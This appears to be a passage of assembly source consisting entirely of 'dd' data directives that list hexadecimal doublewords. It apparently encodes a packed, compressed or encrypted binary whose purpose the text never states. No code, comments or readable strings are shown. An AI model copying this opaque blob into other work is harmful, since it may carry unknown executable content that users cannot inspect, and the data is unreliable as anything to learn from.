39683951h, 40043984h, 3990E358h, 9200F0ACh dd 0FF8A1281h, 0FF65F7D0h, 0D00F75ABh, 0BE6E3149h, 1ABF031Ah dd 37DD0715h, 4D687CDFh, 37361AADh, 3F1AB44Dh, 1AB868F6h dd 4F522730h, 69E71464h, 5076863h, 0B535F700h, 727CE4B9h dd 31400140h, 2EB079Fh, 97139ABEh, 0D2C31A0h, 0E9D8C80Bh dd 403F601h, 7BC51927h, 0CA3BA0F2h, 0DB0725FEh, 7C538A31h dd 34603A30h, 0CEC2689Fh, 0E00492BDh, 304F2338h, 0BC28A703h dd 831CC840h, 2A7676A9h, 295407A3h, 0A207602Bh, 7628C2Dh dd 642B3B92h, 7461525Eh, 80FBE761h, 46435307h, 0D8C80731h dd 58DD65B2h, 2307AF54h, 0B34F072Ch, 0E21D0A8Dh, 0D19F2Eh dd 98A323EBh, 780F37Dh, 60E13B57h, 2B27F14h, 0ED07C003h dd 7F314651h, 0EB0332E2h, 0ACB36CEh, 32F61833h, 0AA0BC013h dd 9A69A603h, 60DE94A6h, 0B2C8384Ah, 10FA9AEBh, 7A8B267Fh dd 34D34433h, 3BC6375Dh, 7E9603B2h, 34D3656Ah, 2E3E5E4Dh dd 9A31FE16h, 0E69A69A6h, 8CA6B8D0h, 9630E374h, 93315C6Dh dd 0DF27025Bh, 4AA40414h, 83535126h, 722EFFC9h, 0C1F954BFh dd 20BB5051h, 0EAB75F20h, 0C5FC821Fh, 7D8B2856h, 88B9C5FCh dd 778297D4h, 0F3C0332Eh, 358B5DABh, 0B73D0328h, 88A06E89h dd 0E88845E4h, 6C8C1405h, 0E08EE93h, 0D8D41DE4h, 872321C8h dd 78DCD4D8h, 0E0C87632h, 5DC0EE0h, 0EF92E4ECh, 0AD6E123h dd 0B9FFF4FCh, 0C0839EC1h, 0AC04133Ch, 33FC4EA6h, 0B78239F6h dd 0F875F772h, 68144875h, 382205FCh, 0CCD6646Ah, 0C4C83DF7h dd 13221B22h, 333BEF18h, 1C1634D9h, 0FF147414h, 500F3870h dd 1682BAFBh, 1009FC8Bh, 0A214EAh, 0E0CCBE7Ch, 0E14BF8D8h dd 0CC86192Eh, 0F105F7Dh, 1CA8EB7h, 70AC763Fh, 8D282A21h dd 3B07F1BEh, 0C81274C7h, 8BFFEEF6h, 88B0450h, 890A8950h dd 441B0451h, 1DE8EB5Eh, 3D8FB7D4h, 588D3F72h, 3D831FC4h dd 4192C60h, 5B6F4175h, 4E8D0CF1h, 0B02BA3Ch, 0CD404688h dd 0A1DB0FD8h, 0C91AD24Ch, 1D40568Ah, 23D9EBA0h, 4ABBB640h dd 0EE76FFDCh, 0B67E10E1h, 8D2E3407h, 354F4786h, 528FB10Ch dd 0DC560114h, 141AFF03h, 0D10E87A9h, 85F88B2Eh, 55B41FFFh dd 8A973F3h, 186783h, 11C47C7h, 73750DE1h, 6240600h, 8D0E460Dh dd 4F8FB28Eh, 4789FBC7h, 9E258A20h, 0F7768688h, 1A67F6B7h dd 8904438Bh, 38041F1Fh, 8A047B89h, 0DB361896h, 0AC97B367h dd 0D0157505h, 8E760040h, 47585EECh, 0C4B6FF4Dh, 7607EB0Bh dd 1B1C3658h, 8550A536h, 0E1803D07h, 9B3C2F34h, 636951CDh dd 7194F8Bh, 66C60189h, 4889DEC9h, 0C260735Ah, 6E7B645Eh dd 0B2ABC7C0h, 0B008B6C4h, 0CDDD3399h, 5AD0BD02h, 0B6579D83h dd 0F21D8BB8h, 2B0AB84Dh, 2AC38011h, 2B5906FBh, 0D31EC01Bh dd 0D0DF0BB9h, 8E5D8D30h, 247C83CCh, 0E10FD308h, 99012DFEh dd 8B470Ch, 0A06B08A3h, 0B1B6C058h, 96CCC9C2h, 60170DD7h dd 0BFB89A4Bh, 0EDB79BBh, 5E8B7FE0h, 0E3B8060h, 4B8B4475h dd 0C2538BF8h, 0F0176D4Dh, 0C0BF0B7h, 0F981FF33h, 0F445D9E0h dd 9BD2C410h, 4174F8EDh, 3974E40Dh, 52FB5D8Dh, 4DBB75FBh dd 7751509Ah, 9643E50h, 4B0DBF51h, 0D2EA97E0h, 89D2322Fh dd 4689187Eh, 768B301Ch, 8BC4C225h, 0D9F044C7h, 51CD16F0h dd 4C6030FFh, 0EDCA7454h, 6B9F2D23h, 58F685F0h, 46C60CDBh dd 0BF63DB64h, 6846DDFBh, 44B3B89h, 153C850Fh, 0F0DF983h dd 0F41E3382h, 1A37DB37h, 0CC255D8h, 2210CA3Bh, 16F87D81h dd 9F7FC1EAh, 46C70975h, 6673C618h, 0D85C23F6h, 8D1A8BE3h dd 1C4E719Fh, 50C488Dh, 0F6DBE106h, 0D7408B20h, 892455CBh dd 874AEC5Dh, 46BFB16Fh, 878D928Fh, 6F42BE4h, 0C6783189h dd 7089C2C8h, 13CB9756h, 42005D8Bh, 430F585Bh, 0BAC6481Dh dd 0CD20CD2Ch, 7746B746h, 0D52B6857h, 0F7B910F9h, 6185C1DBh dd 3135170Bh, 0AC0C1DF4h, 8A0D0B2Ah, 3BE4B574h, 0B5A1286Eh dd 4189DB80h, 49F0459Ch, 61704444h, 0E689E086h, 76704EA6h dd 6F1B272h, 569BEC97h, 88609F2Ch, 0CB73C5F5h, 0EE437389h dd 0C68762CDh, 26572278h, 8BE0861h, 0C5DF169Fh, 0BDDB6205h dd 1CBB1424h, 0DE778BC8h, 9399CC3Eh, 0CF17DCDh, 10020C39h dd 0B3E1D3B8h, 5751CEBh, 0A3030BE8h, 0E04AEB30h, 0D866CF6Ch dd 0D12DD56h, 56CCC941h, 0AF492043h, 25163C6Bh, 5D410052h dd 490D5203h, 732F9Ah, 57005F1Bh, 24C15B4Eh, 0D1102405h dd 1BA2DC08h, 8D7A5070h, 538A305Eh, 0BBA14566h, 0AFC45h dd 0F33BFA05h, 0B90BB5D9h, 121C0972h, 0EF20CF0h, 64F3E6CDh dd 18E87EF4h, 8EEC1AEAh, 8B5EC6FFh, 0C084D7F8h, 45AB2175h dd 0F82140Ch, 7E85927h, 23350332h, 363B236Ch, 418A564Ch dd 3F6EA48h, 11BB5B91h, 3F0B02C2h, 0E4880C06h, 10E7C8F3h dd 0D8140E1Ah, 1C0BC018h, 0F9F9F9E4h, 103E2079h, 28137C24h dd 9A2C0CC8h, 85AE1C0Dh, 2847663h, 85CC3A5Dh, 0DDFD0A66h dd 0D62C144Ah, 641BADEEh, 20038B1Eh, 0E68A17Ch, 0FE420789h dd 4D8F9F4h, 89047808h, 0C606EB3Dh, 1B03E42h, 9142A75Bh dd 0C77F2Eh, 5D8E832Fh, 18069C6Bh, 2259344Bh, 6BDED942h dd 31C2C0Bh, 389F1863h, 0EB3A9BB4h, 0B58FDE02h, 0F709BE56h dd 0DF58878Ch, 5CA24CCEh, 9BDBB60Ch, 4EB89331h, 7D834B58h dd 0FF21610Ch, 83D2C190h, 9D753E78h, 1EEBCE2Eh, 7E1840C7h dd 3A7B115h, 35201556h, 78E0D22Fh, 40592A5Eh, 78100218h dd 527EF7CCh dd 8A1850ABh, 0A06D6015h, 22F62EB2h, 5672854Ah, 0C68C5873h dd 0A274EB53h, 0ECEB36B2h, 0DD1CC631h, 5E75DE56h, 0C86C0628h dd 0CAA37DEh, 72582834h, 0E223C36Bh, 4E57F85Dh, 0B51183E0h dd 728F68C0h, 2E79D2FCh, 0B7E9FBC5h, 7B548FE4h, 0B86005EBh dd 64568D72h, 7F740C55h, 7F89BFDBh, 80F0EB36h, 3700647Eh dd 8B53684Eh, 418B6051h, 52305A6Ah, 810CE91Bh, 708AFFBh dd 0C0A90DAEh, 0D8CFA285h, 0B22C0375h, 66A5F4ADh, 18B81058h dd 0B08428Bh, 3495C807h, 0A95B7348h, 0EC1830FCh, 1029EB1Eh dd 7DCDD08Ah, 0AB5C0461h, 0BBD402E0h, 9774CFEh, 2CF8190Fh dd 0E3533F5Fh, 480F2C41h, 0DB85D8FCh, 0DFFFFCAEh, 2955F1D5h dd 8FA8110h, 75400100h, 0E718D47h, 0A5247B8Dh, 288BA566h dd 15AD5B10h, 765C3007h, 0DE90542Bh, 638369F3h, 0DB3019C4h dd 0CEB1DAEh, 0F612201Ah, 0DD6EDC1h, 66040966h, 20A11407h dd 95DD0B29h, 36EBED9Eh, 0D618094Eh, 0AB66AB4Dh, 0F3352BDBh dd 0F63E2A07h, 0D80B1F42h, 143056CEh, 93ED0C27h, 947CDB1Ah dd 51140A11h, 0DC38BC52h, 0E0DBC3DDh, 10AF930Ch, 14708D3Dh dd 8070296h, 67D9D333h, 87DE8D59h, 8B212A1Ch, 0B2055590h dd 57B216Fh, 5850D771h, 0DB2022EBh, 0F06D03Fh, 528B921Bh dd 0F1218330h, 7E164C50h, 37694CB8h, 4513C50h, 2325833Ch dd 9980F852h, 23183A00h, 0ECACAF4Fh, 0F18BD33Ch, 9F1DCF0Bh dd 3BB90510h, 0F09688F9h, 3B60A5FCh, 80C73294h, 0C4788D52h dd 5F0E7D3Bh, 407CA2h, 478B4097h, 0E869FC3Ch, 8708499h dd 0A8576CD3h, 0E7035A1Dh, 8FE31CFEh, 0D77241D8h, 0D72A528Ah dd 8C3118EBh, 0F246170h, 770C3D20h, 2F09DF24h, 3FF4BE0Ch dd 0E33748A7h, 4AF4BEEFh, 0F77D89CFh, 5B3ADCB8h, 0F8B6B6FBh dd 0E7B40118h, 0E141F6FCh, 0FBBB9AD7h, 0F3A6B674h, 1BEDB376h dd 9A3A1948h, 0E2447F83h, 3661D051h, 0D3C11663h, 0B2311644h dd 0E552D195h, 28F60D8Bh, 0D3E3A2BAh, 76A71E56h, 2254AA60h dd 61A374E0h, 0A9F97FFFh, 8B3A6253h, 118BC14Dh, 674D285h dd 108BC28Bh, 0E083F6EBh, 7BAE16C6h, 0A853B4F4h, 2F8EEB0Ah dd 4B2D58EEh, 20830CA6h, 7682801Ah, 0CF132974h, 845114A0h dd 0C39005EAh, 4D425638h, 0EF143F96h, 0BF76BEFh, 0D08699FFh dd 460A06BAh, 637C5060h, 8CBB07BCh, 0BAA83986h, 34F4B3D3h dd 670C10E3h, 3CA22464h, 2321A792h, 313F077h, 0DC5BF86Ch dd 0D6A5C7Bh, 755A03FFh, 4BA58B19h, 0A17C112Ch, 7744A750h dd 0E519722Dh, 67B6FB5Bh, 2A4B0306h, 18591CEBh, 488B0A73h dd 0F82376CFh, 731477CEh, 13EB4F05h, 2D08401Dh, 66B41AD0h dd 0A9EB232Ch, 0D5EADC1Bh, 148B2C0Bh, 0F67B3602h, 0BA6739C1h dd 108FC16Bh, 13DC1084h, 36DCD85Fh, 18A508B3h, 27F7620h dd 2DF8207Dh, 14045F2Dh, 34F46583h, 76FFFE62h, 40DBBF0Dh dd 184D6889h, 0C33DD950h, 731C7D39h, 1BE86097h, 452BC7EBh dd 4BA2B11Ch, 21FD3AB0h, 73FF4043h, 67DF7C38h, 46EC9EC5h dd 40538A24h, 80F89927h, 800A0D7Fh, 2BBA528Bh, 0B2C9F475h dd 4C4F7815h, 0EC343BC2h, 36360580h, 66342640h, 7565D81Dh dd 5EB35E24h, 41BA68EBh, 6846A16Bh, 0C137C985h, 51D855C0h dd 79834FEEh, 0E1A949F1h, 25746152h, 89540849h, 0CB6359B2h dd 14E2E7C5h, 0DA850B78h, 8014F80Fh, 781A1C60h, 2155364Ch dd 2E0A5F6h, 0E182A5F3h, 1DA4F303h, 0F600D270h, 7C8D0442h dd 73D1A10h, 34FC07DBh, 608318B3h, 8CE4D48h, 631B6944h dd 83882517h, 8B1055CFh, 1FBBB925h, 73838DF0h, 89113C4Ah dd 0D4054042h, 691B133Eh, 0C1A00B3Ch, 30872D08h, 2E93AFB6h dd 77F424CEh, 9A23AEF4h, 83C1C099h, 4C08448Dh, 4306085Eh dd 7526291Fh, 20D83670h, 0EFE8F2D9h, 3874ECE8h, 48E96C3Eh dd 0A27E5148h, 6EE6DF1Ch, 535C73F4h, 44342E54h, 88DB482Ch dd 8E44A955h, 2770BF20h, 0F73B156Dh, 710CD0B3h, 743A3C39h dd 0CC375BA4h, 4160DFA6h, 0C34049D3h, 0D83A46B2h, 2358BC4h dd 0C8AAD6h, 0D79EC342h, 8CD308BAh, 29D63406h, 3F4A376Bh dd 0F09C2C64h, 0B805EB30h, 23201C16h, 1CE12CD0h, 716C8409h dd 15348308h, 23889404h, 269C0CCFh, 2CF6CA57h, 57090234h dd 533F0C31h, 0E95AC1C1h, 14EB1B75h, 0C0EC35DBh, 0BEACD98Bh dd 0DA2B2075h, 1393A572h, 0A4D88357h, 0DA12F8FBh, 522C1054h dd 61022B74h, 0CDB4D9F1h, 3C75B02Dh, 0B6596CB2h, 2303C6Dh dd 0ED24282Ch, 8587B06Eh, 0E62C1074h, 0DC622D2Ch, 511A05AAh dd 823AD083h, 0FD099D6Fh, 0FAC28BFh, 28024FB7h, 0FA469AF5h dd 0E3DD728h, 0C64B6361h, 21BBF65Bh, 0A028399Dh, 15B7095Ah dd 8134080Eh, 0D6E66311h, 21F1DE5h, 0B5CA830Ah, 0B58B9EEBh dd 5960168Ah, 88E62015h, 11CCC43h, 6D803BE0h, 7189C06Fh dd 459890Bh, 1378C918h, 0CA4F61D8h, 1B22C857h, 8B154870h dd 5C137207h, 9436D8C4h, 2F03B04Bh, 1BDB6CB2h, 1842A72Dh dd 5A20056Ah, 0EDADC47Eh, 8B34883Bh, 0C23B8104h, 23B35C7Eh dd 0EE578DF4h, 0B740368h, 81E9BE53h, 3C1BE756h, 1539E440h dd 3E88FFDh, 8B250F85h, 6A8E2237h, 6177A13Dh, 59A258h dd 0B38B01A0h, 0DDECA8D4h, 58BEF8Dh, 0FEBDC89h, 6A604324h dd 7ED0211Ch, 0BEDAB01Bh, 0BF313990h, 6A3766CEh, 16758A15h dd 3BB9EC63h, 231DF033h, 7136EC6Eh, 354D738Bh, 77096418h dd 0DE7B574Dh, 58B65968h, 544C3005h, 1B1830B4h, 0D6CB2E46h dd 5C480C18h, 1950AE54h, 345979ECh, 541A125Ch, 0AFFE1DB7h dd 90E80DBBh, 4059D8Ch, 0C7445389h, 0A31C4800h, 291A7D2Bh dd 0BEC63B01h, 44DB0293h, 0C77018EAh, 53067B43h, 10B7631Eh dd 0A48EBA22h, 96F5C03Eh, 4CC6063Bh, 840C3421h, 0B9A0E512h dd 5D146130h, 0BB354884h, 3526D721h, 29E80E2Ah, 0F758C907h dd 78A6B259h, 916B570Ah, 0B58A8468h, 0F7B1875h, 29DE006Eh dd 1A6FD40Ah, 7A8D1B6Ah, 9F075910h, 1858E02Ch, 0BFF3E14Dh dd 2E1D7C06h, 105109C9h, 0A050984Eh, 991A3700h, 323243B7h dd 46326B86h, 4DCE0CFCh, 398CA64Dh, 665BA360h, 0B6320AB4h dd 0AD70D6Dh, 4A31AA64h, 77597A08h, 0D1DED8FBh, 0E0CA664Ah dd 324B14AAh, 42C08571h, 0C681181h, 5FA8939Ch, 605C47ABh dd 14B98F0Ch, 0D3CB428Eh, 530084F2h, 843B1931h, 5CBB800Eh dd 0EC278A60h, 90A46ECCh, 8D8066E2h, 670A4E5Ch, 0C46E4145h dd 0FA008897h, 25300C88h, 38EC8191h, 2BC41D10h, 125725CCh dd 0CD6807BFh, 3304B9AEh, 0E6C3BAFFh, 0D89680D9h, 0FC04DCDAh dd 3B3E6C9Eh, 0CA0CC812h, 0D010CC0Eh, 0D9910B18h, 0D41AD27Ch dd 9466F820h, 36DD028h, 2CE213E0h, 0D5D40FD2h, 0A2531740h dd 0A0083056h, 0C228656Dh, 995D8D57h, 0A7365B61h, 0C80A1ED6h dd 0B7580C81h, 0D011CB21h, 500C83Bh, 0F6C8B7Dh, 11D83B18h dd 788C3DB6h, 3FEE2284h, 0ECBA1F6Fh, 2004B809h, 7F0C8DF8h dd 0B419E7C1h, 48EEC42Dh, 44D521C4h, 77F4DC07h, 56EFACE8h dd 53BF773Ah, 8D458189h, 0D106DC60h, 0F6E0B541h, 96DE8C00h dd 4D5B17A0h, 7D318BE0h, 4581C128h, 0AFAC99A0h, 0F4BBB9A2h dd 0BAB60DFFh, 8DC2FF50h, 32B87373h, 6A9A2E89h, 7A8DDF00h dd 0B6E5B5F8h, 0DF86675h, 3040883h, 96FB02ECh, 6F4D68Eh dd 114279Dh, 0F0B41BE9h, 0B2176E6Dh, 5E377B85h, 460014F0h dd 0FF1E19B9h, 0FEEE150Ch dd 0A093A00Ch, 3889CABBh, 0C651E35Fh, 7BD41C31h, 6C6AE279h dd 73718B8Ch, 0FE00F4Dh, 2CD3591Bh, 63A239A3h, 0FBC321C3h dd 130C1A1Eh, 282B5AD1h, 8C140D71h, 26734182h, 0BA438364h dd 0E017750Eh, 8308A80Eh, 9C383597h, 904C0D5Bh, 9BD2F893h dd 8128481Ah, 0C401147Bh, 0B80775FCh, 0A6D834ACh, 4637EB2Ah dd 0A445B957h, 93C5278h, 5304C053h, 735A01BDh, 682F8740h dd 68F14CD9h, 9BBDFDC4h, 3B1D6A5Fh, 0BE4C8BBFh, 8193A354h dd 7F061479h, 1AE00A1h, 81208D6Dh, 7605DC38h, 6854D005h dd 6001B1Bh, 3C725E2Ch, 2FA39DDDh, 29665D14h, 19112830h dd 9C9B584Ah, 582106EAh, 640611BAh, 0E8187151h, 49700E0Eh dd 2117F67h, 589B7F08h, 57EE085h, 284A7427h, 0B952211Dh dd 7A8D4D10h, 687D49C8h, 468C0C76h, 39578414h, 2BAB7EA4h dd 46895F18h, 7C1E8B10h, 150FC0E0h, 0FAC38156h, 0B95E551Dh dd 721FF87h, 60C38356h, 9AB8ECEBh, 1995ED51h, 73D64B18h dd 7E748253h, 57DACCD5h, 0A577E434h, 0E830B89h, 0AA437632h dd 7F478D47h, 9036FF47h, 80CC0BECh, 891840F1h, 87838147h dd 579E9707h, 60579E7Ch, 0AC5A2DBDh, 0B43E8750h, 98057D68h dd 6B3CA390h, 81E0663Ch, 0C683F06Eh, 7579FF04h, 450C4993h dd 2D3218BEh, 1EF65810h, 712CD890h, 4650BE9Ch, 0D0480D8Bh dd 0DFFBFEEh, 0D08A147Dh, 0C83B09B8h, 7541588h, 0FF065574h dd 0EF3E1A2Dh, 98BC459h, 0F375DF3Bh, 944D1314h, 5379D61Bh dd 9E976F9Bh, 56F98C35h, 1E47754Ch, 103844F0h, 0E1584B54h dd 57184503h, 0C3C4DE1Ah, 0FDD7CA06h, 25340125h, 9710F750h dd 18161CEBh, 0D58C102Eh, 44928733h, 0B618D126h, 1483553Ah dd 42F84008h, 0A92F05A1h, 0D0EAB1CAh, 9CAB70BFh, 507C7589h dd 0E4E8DF2h, 58EE5589h, 0E6ED1B75h, 0A5A3D35h, 829505B8h dd 0BA8083B0h, 9C518C49h, 1C107B9h, 860F5581h, 0A09B0597h dd 4E8F0483h, 2A748EEAh, 607EC0E5h, 7480350Fh, 0CA061F1Ah dd 0AA3162Ah, 2A895327h, 2654F7C0h, 0E177C928h, 9E4A7461h dd 1274F446h, 58A9649Dh, 5847388Ch, 64B7E0F4h, 4F30F400h dd 5598430Ch, 0D0278DCAh, 0BA1F7827h, 0BCA23DD7h, 3104CA1h dd 0A9422A7Ah, 81E045C7h, 0DD08A840h, 8A5414B0h, 0DF8E76E5h dd 0A33772D6h, 0B9D3FF2Dh, 2E0E6A1Fh, 8F3447B4h, 41D60A23h dd 0A256C51Eh, 315921ADh, 57361087h, 1C6EB780h, 150F04BDh dd 0D7374450h, 9517F3Ah, 0D0B0FA0Ch, 8A99A266h, 0D54C5304h dd 9037BE87h, 0A46FC25Ah, 0C7B2FFD3h, 3AC10D10h, 521FEB34h dd 0C1D95152h, 387D6A78h, 3056D951h, 30EC908h, 345653BFh dd 2251FA5h, 8CB000E0h, 0D41C27E7h, 80E53AA1h, 3C2D6DBFh dd 0F0B31EAh, 0F3DC6887h, 71880C60h, 5F04D947h, 985A1039h dd 8AE1A4Dh, 8123FCD0h, 590C86D7h, 26F011FCh, 420C9C87h dd 0FCFCF8E4h, 2D812B3Bh, 0D28F5D3Ah, 0C61EE155h, 2C4B0C00h dd 0C80CC9D8h, 8080C81h, 0E59193DDh, 80F1463h, 88E408F8h dd 8BF8F253h, 0B38DF84Eh, 0E21D6803h, 855DB93h, 9BA68388h dd 0F9A5E59h, 842D42Ah, 9E084A89h, 11AF1C01h, 2B651471h dd 926F19B8h, 0C7F45E9h, 0D620D5C7h, 454CC803h, 10F2D2C2h dd 38BAF3E0h, 1E770C7Eh, 9F210394h, 0CB113108h, 17212162h dd 2156D48Ah, 39097EBEh, 0C9347C50h, 73C2D8F3h, 7F04DA2Dh dd 1EBEC017h, 0E1449C48h, 0D90D74CEh, 897B7091h, 74C2E36Fh dd 3B67B893h, 8740C20h, 77360F35h, 0EB8FECABh, 0A9658D8h dd 0B299219Fh, 41431F07h, 810E4112h, 0FE0F5C25h, 81F46D93h dd 43037759h, 97D75860h, 0C33490C1h, 0AF4476CCh, 3B21D9B0h dd 0EC98AF6Dh, 9A401AA3h, 75095C00h, 84683DECh, 0B75D4E15h dd 161C90EDh, 3B0A264Ah, 9A69362Eh, 0F29B08B1h, 6DF30CDEh dd 2901C90Ch, 0A7581B0Dh, 0DB933491h, 473DDBEFh, 0E944C298h dd 308DF586h, 69CF0E44h, 992A2D16h, 5314E30Ch, 0B8DDC075h dd 60140773h, 75727E80h, 2ED21A4Eh, 398756E8h, 7495D233h dd 0CA0C7930h, 0C048C4B1h, 6F4DB94Dh, 167AB7F7h, 58EC588Bh dd 0FFE38110h, 0B8C4C0Fh, 6F750806h, 7E0C9B1Bh, 4A47D103h dd 0F56B1ED2h, 147EE82Dh, 0C61689B9h, 0B85A9246h, 53B78FDh dd 3EB1454h, 4948C8DEh, 235C1976h, 1925A75h, 2A3A1058h dd 366FB76Bh, 754FFC8Ch, 796683EAh, 19866680h, 1B5024B6h dd 3C17C252h, 17C4B618h, 3956BA02h, 1871105Dh, 7D9F2BCBh dd 83E34C1h, 718B08CEh, 759CDF45h, 0D375615Dh, 5814D214h dd 751C5938h, 6DBB5B50h, 5D1D41C1h, 804CEF8h, 6A976FDFh dd 1450F3CEh, 0F8550148h, 5AD2D33Bh, 0C84E476Bh, 139418EBh dd 0D4230CEAh, 0B6EFA5A6h, 0EBB3FFFAh, 2139D3CAh, 0FDFA8F14h dd 4056F61h, 16D641C6h, 50646F6h, 5BEB0CDCh, 4A878AE7h dd 56E48EF8h, 0E6E5C060h, 14A86C5Ah, 89AAADE1h, 0DDB2AF00h dd 8B2D6B77h, 0A5F33B36h, 0EB3C7C74h, 4B77EDCFh, 3D743E75h dd 77147255h, 29C28B02h, 0BB76E06h, 13D02BDFh, 0A4EB9704h dd 1BA0744Dh, 172B7610h, 4EFD686h, 3DD2F3DBh, 368DB6Bh dd 0CD4D9ADh, 1229CB27h, 18AB9AB4h, 202CC22Ah, 86DABB48h dd 37110115h, 0B54B4E86h, 0CAAAC243h, 46658714h, 0BDAB1F6Fh dd 59066A57h, 56FE8B14h, 10E340B8h, 0D2991B4h, 0CD6ACC2Dh dd 6DC4A3EEh, 156614A0h, 12B302B6h, 241E088h, 50D75062h dd 29C533Ch, 6FCC0CEEh, 7E8D1EFEh, 1FD06608h, 465459C0h dd 568AE8EBh, 7ADB8069h, 0E52ECE0Fh, 0E7BD3114h, 61DD6CCh dd 6820F454h, 642DD81Eh, 619DB0CFh, 6500101Dh, 4036A91Ah dd 0BDEE5A55h, 462D54B4h, 0FE34FD6Fh, 8CA02CB7h, 0F39FF98Ch dd 54D6ED6Fh, 0F9D19AB8h, 0DA75273Fh, 78EC03Eh, 513C5F82h dd 0D4B85393h, 37170E42h, 0BC575BABh, 721B6ABAh, 87B249BEh dd 3F736DFh, 0F9190B68h, 20B1FC0h, 46473C8Ch, 0C800D2C4h dd 0FC18888Eh, 0CB85CC8Ch, 0C68DED02h, 36B3F803h, 1A24C19Ch dd 61B456Ch, 1781BD63h, 27D19A3Fh, 7E4D7701h, 908B4298h dd 0BD40B06Fh, 830C33FBh, 0E9F714C1h, 0A8F1B6CDh, 0F458853h dd 3314756Eh, 7DB38447h, 4D8A7447h, 32A4170Fh, 7031F620h dd 0B1AE6225h, 6BED052h, 646D80B8h, 0A38109B3h, 0B2701F29h dd 7982FB1Dh, 0CE49E80Ch, 94BE43D1h, 5B535241h, 55746A70h dd 0B1B9E0A4h, 9E147E08h, 6D5BBAF8h, 0C4201CD0h, 23F61122h dd 2B762060h, 0D8C7E0E8h, 80180305h, 1E89EF17h, 0F02F6CE5h dd 8E9076C0h, 0B771FB3Bh, 247B7D1h, 8F7BE39Ah, 9F8B2B54h dd 97CCFD5Ah, 887880Ch, 0D83B0B02h, 351EF012h, 19EA2223h dd 64D42846h, 1AF54BECh, 424C22F3h, 531F8021h, 735B3320h dd 96830111h, 819C0885h, 1C068158h, 16D1D043h, 4D99B362h dd 0D4BD1E4Bh, 46464646h, 0DC94D8FCh, 46F6161Fh, 0A5CBB30Dh dd 0EFBD8D69h, 0C78BBF61h, 8BC54D89h, 5BBBF18h, 0A25781A3h dd 0EC65CC7Eh, 9411A508h, 37893DCAh, 9D6F263Eh, 1A496C1Bh dd 0B602EC0Fh, 0AB6831FFh, 61135B3h, 0FFF04150h, 0FB6C5EF7h dd 0A2278303h, 0A559F093h, 88403FBFh, 53ABB739h, 0FFFFFE1Ah dd 21B30833h, 249F4A8Ah, 43850A90h, 0C64657E9h, 0B054212Dh dd 171F99EBh, 970E016Dh, 6D3F88B2h, 1E3A3175h, 898A4805h dd 516CC689h, 8BF54848h, 7992FFEDh, 0BF0246E2h, 30306B38h dd 0EE6BD78Ah, 5063435h dd 768A810Ch, 0CF0AD939h, 3F3BB3Ch, 0E11C231Ch, 0FE565ADEh dd 0A3AC6A05h, 933B7593h, 1B3140A1h, 0B451329h, 14A30820h dd 0FBAD46CEh, 234BC38Bh, 3CA692C1h, 0A1367014h, 0FBC3946Ch dd 42B66C2Eh, 0A1728AE7h, 0DA043D8Ah, 0F6C4CD86h, 8B8AD04Bh dd 6054F2h, 655CE133h, 806FC34Ah, 90494C35h, 0D9884D38h dd 0C7DE27B0h, 30234E06h, 660F73Fh, 0F5528101h, 18363C05h dd 45C72011h, 3240C362h, 0F48880C0h, 0EBA21A4Ch, 8C47C7B0h dd 83659159h, 1C4D6C12h, 2F6D872h, 3C740F0Ah, 0DAB3C212h dd 0E106B57h, 0E03CCD96h, 74F8083h, 1E0E85D8h, 7B830B4Dh dd 8540B94h, 8F547C0Fh, 0E7931EE8h, 1BBBBE2Dh, 35750252h dd 19741005h, 831247F6h, 9E00BD0Bh, 5C6A1075h, 0C530087Bh dd 66BBB86Ah, 758FA7F3h, 539A570Ah, 163145Ah, 570228C0h dd 0B2585232h, 0D0D12961h, 39D37B2Ch, 7401D0C6h, 0CC868B71h dd 4BEC6419h, 8D534F27h, 86CBCD9Eh, 19192190h, 0EF86868Eh dd 960E464Eh, 1545BCBh, 0B1571375h, 56AC5D25h, 0AB04ACB6h dd 5428E6E7h, 0CC057B01h, 91919102h, 0DCC4C891h, 919191BCh dd 0C0B4B891h, 919981D0h, 0E0D8D491h, 0C9452800h, 0E200FFC8h dd 9EE886EDh, 0BAE904h, 235686F0h, 2170BFC2h, 0BA01FB36h dd 8B0E5A4Dh, 0C6033C70h, 1C8DB454h, 100641BCh, 0C2D16F00h dd 0EB386ED7h, 1635EE0h, 0BADD221Ah, 901426FCh, 0F17C0B17h dd 7D7A4A76h, 0E87F071Dh, 37FFADEh, 8A188AC2h, 751E3ACBh dd 30C9841Ah, 0C01588Ah, 15BB715Eh, 46905D50h, 0E2751146h dd 7605A3FFh, 401B05CFh, 831B4FD8h, 83022045h, 8B42A681h dd 96723CC7h, 57C5FC3Bh, 0BC727AB3h, 20EE4A33h, 8FF06A2Dh dd 0B70F0CADh, 8DF22B00h, 82D4455Dh, 630B5B8h, 0AA4EDF81h dd 53FA2BDAh, 6164410Ch, 0C8003170h, 13F452B5h, 0D60F0403h dd 3BA5FB0Eh, 6F636F74h, 1244176Ch, 0F4533019h, 42671752h dd 0C16778F1h, 94D55677h, 0EBC4B4Dh, 2BBEC648h, 0CA94091h dd 2A02811Dh, 87F4E456h, 0B0BED557h, 16387870h, 0ECF20320h dd 2D0B157Ah, 8B244E75h, 0FA74032Ch, 0DFA3A05Dh, 0FEC5DB0h dd 3F53C320h, 220F4FFFh, 6B621601h, 20510F48h, 4BD45076h dd 9E9E56C1h, 2D346883h, 3EA96A38h, 311A57DAh, 0F3481CA3h dd 205D12B0h, 20481694h, 141C85CFh, 7C8760C2h, 0EC187217h dd 47A37862h, 3E50CEB3h, 88895B92h, 5E2B66B5h, 1227105h dd 0DE210E23h, 745FFB67h, 0E91807F1h, 63BB2FA1h, 95C76F14h dd 3D24053Fh, 5BF7505Ch, 454400D1h, 690076h, 895C0763h dd 876DDDC2h, 730B64h, 0D7AE0772h, 611B9B75h, 1D6D030Bh dd 1B720374h, 203C5D63h, 3B558CDFh, 8DC11763h, 6E651F74h dd 7D179B21h, 49506DCFh, 752EDh, 0B6426F63h, 6937CC0Dh dd 0B3275C0Dh, 0A9119440h, 3218866Ch, 0F0D0BDB4h, 2EA8685Ch dd 0E25E5009h, 0DA186809h, 2153B281h, 5606D4F7h, 1C4B5012h dd 865A2826h, 8308E25Ah, 0F6ADDA95h, 70D85B7h, 22C4AA58h dd 5153944Dh, 6F3BFC68h, 9476D6EEh, 9C889820h, 0B0060DC8h dd 0E46206FEh, 14B43EE6h, 0E0B8142Fh, 0DB2DB6C0h, 0CC288FF6h dd 57D4D002h, 880C7E20h, 68E83EE6h, 79402F0Ch, 0C41B2F73h dd 1E241816h, 6A38568Bh, 0E21501DEh, 46FA8B1Bh, 1AB859A1h dd 6F0DE007h, 0B8F716D1h, 5E920920h, 70028934h, 0F25E8BF5h dd 4B868940h, 63547846h, 0FA22C115h, 